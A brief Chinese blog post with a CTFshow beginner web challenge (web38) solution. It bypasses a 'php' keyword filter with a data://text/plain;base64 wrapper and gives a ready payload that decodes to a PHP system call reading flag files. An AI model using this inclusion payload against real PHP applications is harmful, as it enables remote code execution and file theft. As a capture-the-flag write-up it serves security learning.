CTFshow WEB入门38

在web37的基础上过滤了php
使用data://text/plain;base64绕过
payload:?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs=
PD9waHAgc3lzdGVtKCJjYXQgZioiKTs=即<?php system("cat f*");

posted @ 2021-02-02 10:13  z1ten9  阅读(147)  评论(0)    收藏  举报